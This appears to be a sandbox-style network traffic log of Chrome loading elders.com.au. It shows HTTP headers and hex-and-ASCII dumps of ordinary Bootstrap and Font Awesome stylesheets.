                                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:43 GMT
                                                                                                                                                                                                            Content-Type: text/css;charset=utf-8
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            cache-control: public, max-age=2592000, immutable
                                                                                                                                                                                                            last-modified: Fri, 23 Feb 2024 00:15:07 GMT
                                                                                                                                                                                                            etag: W/"0-2386f26fb1bdc0"
                                                                                                                                                                                                            x-vhost: publish
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Age: 432341
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31557600
                                                                                                                                                                                                            X-Served-By: cache-dfw-kdfw8210025-DFW
                                                                                                                                                                                                            X-Cache: HIT
                                                                                                                                                                                                            X-Timer: S1709612817.573046,VS0,VS0,VE6
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2affeedc86b61-DFW


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            34192.168.2.457697162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC615OUTGET /etc.clientlibs/el/clientlibs/clientlib-site.lc-b12902665e7f329d47d0e56b8a41e8e6-lc.min.css HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC614INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:43 GMT
                                                                                                                                                                                                            Content-Type: text/css;charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=2592000, immutable
                                                                                                                                                                                                            last-modified: Thu, 17 Oct 2024 04:33:46 GMT
                                                                                                                                                                                                            etag: W/"6951d-2386f26fb1bdc0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-pao-kpao1770043-PAO
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1729139626.705267,VS0,VS0,VE848
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 1731357
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2afff3c7328b3-DFW
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC755INData Raw: 37 64 33 38 0d 0a 3a 72 6f 6f 74 7b 2d 2d 62 73 2d 62 6c 75 65 3a 23 30 64 36 65 66 64 3b 2d 2d 62 73 2d 69 6e 64 69 67 6f 3a 23 36 36 31 30 66 32 3b 2d 2d 62 73 2d 70 75 72 70 6c 65 3a 23 36 66 34 32 63 31 3b 2d 2d 62 73 2d 70 69 6e 6b 3a 23 64 36 33 33 38 34 3b 2d 2d 62 73 2d 72 65 64 3a 23 64 63 33 35 34 35 3b 2d 2d 62 73 2d 6f 72 61 6e 67 65 3a 23 66 64 37 65 31 34 3b 2d 2d 62 73 2d 79 65 6c 6c 6f 77 3a 23 66 66 63 31 30 37 3b 2d 2d 62 73 2d 67 72 65 65 6e 3a 23 31 39 38 37 35 34 3b 2d 2d 62 73 2d 74 65 61 6c 3a 23 32 30 63 39 39 37 3b 2d 2d 62 73 2d 63 79 61 6e 3a 23 30 64 63 61 66 30 3b 2d 2d 62 73 2d 77 68 69 74 65 3a 23 66 66 66 3b 2d 2d 62 73 2d 67 72 61 79 3a 23 36 63 37 35 37 64 3b 2d 2d 62 73 2d 67 72 61 79 2d 64 61 72 6b 3a 23 33 34 33 61 34
                                                                                                                                                                                                            Data Ascii: 7d38:root{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a4
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 31 35 29 2c 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 30 29 29 7d 2a 2c 3a 61 66 74 65 72 2c 3a 62 65 66 6f 72 65 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 72 65 64 75 63 65 64 2d 6d 6f 74 69 6f 6e 3a 6e 6f 2d 70 72 65 66 65 72 65 6e 63 65 29 7b 3a 72 6f 6f 74 7b 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 3a 73 6d 6f 6f 74 68 7d 7d 2e 79 6f 75 69 72 2d 61 63 74 69 76 65 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 20 62 6c 75 65 7d 62 6f 64 79 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63
                                                                                                                                                                                                            Data Ascii: hsla(0,0%,100%,.15),hsla(0,0%,100%,0))}*,:after,:before{box-sizing:border-box}@media (prefers-reduced-motion:no-preference){:root{scroll-behavior:smooth}}.youir-active{border-bottom:2px solid blue}body{-webkit-text-size-adjust:100%;-webkit-tap-highlight-c
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 75 6c 20 75 6c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 64 74 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 64 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 62 6c 6f 63 6b 71 75 6f 74 65 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 72 65 6d 7d 62 2c 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 65 72 7d 2e 73 6d 61 6c 6c 2c 73 6d 61 6c 6c 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 7d 2e 6d 61 72 6b 2c 6d 61 72 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 63 66 38 65 33 3b 70 61 64 64 69 6e 67 3a 2e 32 65 6d 7d 73 75 62 2c 73 75 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74
                                                                                                                                                                                                            Data Ascii: ul ul{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}b,strong{font-weight:bolder}.small,small{font-size:.875em}.mark,mark{background-color:#fcf8e3;padding:.2em}sub,sup{font-size:.75em;line-height:0;posit
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 72 6f 6c 65 3d 62 75 74 74 6f 6e 5d 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 73 65 6c 65 63 74 7b 77 6f 72 64 2d 77 72 61 70 3a 6e 6f 72 6d 61 6c 7d 5b 6c 69 73 74 5d 3a 3a 2d 77 65 62 6b 69 74 2d 63 61 6c 65 6e 64 61 72 2d 70 69 63 6b 65 72 2d 69 6e 64 69 63 61 74 6f 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 2c 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d
                                                                                                                                                                                                            Data Ascii: tarea{font-family:inherit;font-size:inherit;line-height:inherit;margin:0}button,select{text-transform:none}[role=button]{cursor:pointer}select{word-wrap:normal}[list]::-webkit-calendar-picker-indicator{display:none}[type=button],[type=reset],[type=submit]
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6c 65 61 64 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 7d 2e 64 69 73 70 6c 61 79 2d 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 36 32 35 72 65 6d 20 2b 20 34 2e 35 76 77 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 64 69 73 70 6c 61 79 2d 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 35 72 65 6d 7d 7d 2e 64 69 73 70 6c 61 79 2d 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 35 37 35 72 65 6d 20 2b 20 33 2e 39 76
                                                                                                                                                                                                            Data Ascii: ign:baseline}[hidden]{display:none!important}.lead{font-size:1.25rem;font-weight:300}.display-1{font-size:calc(1.625rem + 4.5vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-1{font-size:5rem}}.display-2{font-size:calc(1.575rem + 3.9v
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 65 65 32 65 36 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 3b 70 61 64 64 69 6e 67 3a 2e 32 35 72 65 6d 7d 2e 66 69 67 75 72 65 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 66 69 67 75 72 65 2d 69 6d 67 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 7d 2e 66 69 67 75 72 65 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 36 63 37 35 37 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 7d 2e 63 6f 6e 74 61 69 6e 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 66 6c 75 69 64 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 6c 67 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 6d 64 2c 2e 63
                                                                                                                                                                                                            Data Ascii: nd-color:#fff;border:1px solid #dee2e6;border-radius:.25rem;padding:.25rem}.figure{display:inline-block}.figure-img{line-height:1;margin-bottom:.5rem}.figure-caption{color:#6c757d;font-size:.875em}.container,.container-fluid,.container-lg,.container-md,.c
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 6f 77 2d 63 6f 6c 73 2d 32 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 35 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 33 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 33 33 2e 33 33 33 33 33 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 34 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 32 35 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 35 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 32 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 36 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 36 2e 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 61 75 74 6f 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 63 6f 6c 2d 31 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f
                                                                                                                                                                                                            Data Ascii: ow-cols-2>*{flex:0 0 auto;width:50%}.row-cols-3>*{flex:0 0 auto;width:33.33333%}.row-cols-4>*{flex:0 0 auto;width:25%}.row-cols-5>*{flex:0 0 auto;width:20%}.row-cols-6>*{flex:0 0 auto;width:16.66667%}.col-auto{flex:0 0 auto;width:auto}.col-1{flex:0 0 auto
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 29 7b 2e 63 6f 6c 2d 73 6d 7b 66 6c 65 78 3a 31 20 30 20 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 61 75 74 6f 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 31 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 32 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 35 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 33 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 33 33 2e 33 33 33 33 33 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 34 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 32 35 25 7d 2e 72
                                                                                                                                                                                                            Data Ascii: min-width:320px){.col-sm{flex:1 0 0%}.row-cols-sm-auto>*{flex:0 0 auto;width:auto}.row-cols-sm-1>*{flex:0 0 auto;width:100%}.row-cols-sm-2>*{flex:0 0 auto;width:50%}.row-cols-sm-3>*{flex:0 0 auto;width:33.33333%}.row-cols-sm-4>*{flex:0 0 auto;width:25%}.r
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 30 2e 32 35 72 65 6d 7d 2e 67 2d 73 6d 2d 32 2c 2e 67 78 2d 73 6d 2d 32 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 30 2e 35 72 65 6d 7d 2e 67 2d 73 6d 2d 32 2c 2e 67 79 2d 73 6d 2d 32 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 30 2e 35 72 65 6d 7d 2e 67 2d 73 6d 2d 33 2c 2e 67 78 2d 73 6d 2d 33 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 31 72 65 6d 7d 2e 67 2d 73 6d 2d 33 2c 2e 67 79 2d 73 6d 2d 33 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 31 72 65 6d 7d 2e 67 2d 73 6d 2d 34 2c 2e 67 78 2d 73 6d 2d 34 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 31 2e 35 72 65 6d 7d 2e 67 2d 73 6d 2d 34 2c 2e 67 79 2d 73 6d 2d 34 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 31 2e 35 72 65 6d 7d 2e 67 2d 73 6d 2d 35 2c 2e 67 78 2d 73 6d 2d 35 7b 2d 2d 62 73 2d 67
                                                                                                                                                                                                            Data Ascii: 0.25rem}.g-sm-2,.gx-sm-2{--bs-gutter-x:0.5rem}.g-sm-2,.gy-sm-2{--bs-gutter-y:0.5rem}.g-sm-3,.gx-sm-3{--bs-gutter-x:1rem}.g-sm-3,.gy-sm-3{--bs-gutter-y:1rem}.g-sm-4,.gx-sm-4{--bs-gutter-x:1.5rem}.g-sm-4,.gy-sm-4{--bs-gutter-y:1.5rem}.g-sm-5,.gx-sm-5{--bs-g
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 74 3a 35 30 25 7d 2e 6f 66 66 73 65 74 2d 6d 64 2d 37 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 38 2e 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 6d 64 2d 38 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 36 36 2e 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 6d 64 2d 39 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 37 35 25 7d 2e 6f 66 66 73 65 74 2d 6d 64 2d 31 30 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 33 2e 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 6d 64 2d 31 31 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 39 31 2e 36 36 36 36 37 25 7d 2e 67 2d 6d 64 2d 30 2c 2e 67 78 2d 6d 64 2d 30 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 30 7d 2e 67 2d 6d 64 2d 30 2c 2e 67 79 2d 6d 64 2d 30 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 30 7d 2e 67 2d 6d 64 2d 31 2c 2e 67 78 2d
                                                                                                                                                                                                            Data Ascii: t:50%}.offset-md-7{margin-left:58.33333%}.offset-md-8{margin-left:66.66667%}.offset-md-9{margin-left:75%}.offset-md-10{margin-left:83.33333%}.offset-md-11{margin-left:91.66667%}.g-md-0,.gx-md-0{--bs-gutter-x:0}.g-md-0,.gy-md-0{--bs-gutter-y:0}.g-md-1,.gx-


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            35192.168.2.457702104.17.25.144432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC584OUTGET /ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css HTTP/1.1
                                                                                                                                                                                                            Host: cdnjs.cloudflare.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC950INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:43 GMT
                                                                                                                                                                                                            Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            Cache-Control: public, max-age=30672000
                                                                                                                                                                                                            ETag: W/"5eb03e5f-7918"
                                                                                                                                                                                                            Last-Modified: Mon, 04 May 2020 16:10:07 GMT
                                                                                                                                                                                                            cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 332881
                                                                                                                                                                                                            Expires: Mon, 27 Oct 2025 05:29:43 GMT
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zANfB6Q%2F%2BzApeqTVIkzsRuGnlwuySbe93XuA%2B1Q1Rf1EDy18oMoJaLpbjqb2yzEU9%2FOZ%2BdEDO9otbEwJ8p4ITTDgnLzkB34yndjWdBow4CwAHPXxhhU9RzHrC98maaBw%2FPedkaMu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2afff3fd4e857-DFW
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC419INData Raw: 37 39 31 38 0d 0a 2f 2a 21 0a 20 2a 20 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 34 2e 37 2e 30 20 62 79 20 40 64 61 76 65 67 61 6e 64 79 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 20 2d 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 0a 20 2a 20 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 2f 6c 69 63 65 6e 73 65 20 28 46 6f 6e 74 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 53 53 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 46 6f 6e 74 41 77 65 73 6f 6d 65 27 3b 73 72 63 3a 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 65 6f 74 3f 76 3d 34 2e 37
                                                                                                                                                                                                            Data Ascii: 7918/*! * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License) */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot?v=4.7
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 77 6f 66 66 3f 76 3d 34 2e 37 2e 30 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 2c 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 74 74 66 3f 76 3d 34 2e 37 2e 30 27 29 20 66 6f 72 6d 61 74 28 27 74 72 75 65 74 79 70 65 27 29 2c 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 73 76 67 3f 76 3d 34 2e 37 2e 30 23 66 6f 6e 74 61 77 65 73 6f 6d 65 72 65 67 75 6c 61 72 27 29 20 66 6f 72 6d 61 74 28 27 73 76 67 27 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 7d 2e 66 61 7b 64 69 73 70 6c 61 79 3a
                                                                                                                                                                                                            Data Ascii: ./fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'),url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'),url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display:
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 73 70 69 6e 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67
                                                                                                                                                                                                            Data Ascii: -webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 63 6b 2d 31 78 2c 2e 66 61 2d 73 74 61 63 6b 2d 32 78 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 66 61 2d 73 74 61 63 6b 2d 31 78 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 2e 66 61 2d 73 74 61 63 6b 2d 32 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 7d 2e 66 61 2d 69 6e 76 65 72 73 65 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 66 61 2d 67 6c 61 73 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 30 22 7d 2e 66 61 2d 6d 75 73 69 63 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 31 22 7d 2e 66 61 2d 73 65 61 72 63 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 32 22
